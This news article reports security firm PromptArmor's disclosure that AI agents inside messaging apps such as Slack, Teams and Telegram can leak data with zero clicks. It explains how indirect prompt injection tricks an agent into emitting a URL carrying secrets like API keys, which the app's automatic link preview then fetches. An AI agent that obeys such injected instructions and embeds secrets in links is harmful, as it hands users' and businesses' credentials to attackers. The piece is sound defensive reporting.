AI agents running inside messaging apps can leak sensitive data through automatic link previews, researchers at AI security firm PromptArmor have warned, creating a zero-click data exfiltration risk.

The flaw reportedly exploits indirect prompt injection. For example, an attacker tricks an agent into generating a malicious URL containing sensitive information, such as API keys, in its query string. Messaging platforms like Slack, Teams, Telegram and Discord often fetch links automatically to generate previews, meaning the data-leaking URL can be requested instantly, without the user clicking it.

PromptArmor said: “In agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link.”

To test exposure, the firm created the AITextRisk.com website, which logs preview fetches from different agent and app combinations. Reported at-risk pairings include Microsoft Teams with Copilot Studio and Telegram with OpenClaw, the latter being exposed by default unless link previews are disabled in its configuration.

Businesses using AI agents in messaging platforms should review preview settings urgently, disable link previews in sensitive channels where possible, restrict agent access to secrets, and test their own app and agent pairings to identify potential zero-click data loss risks.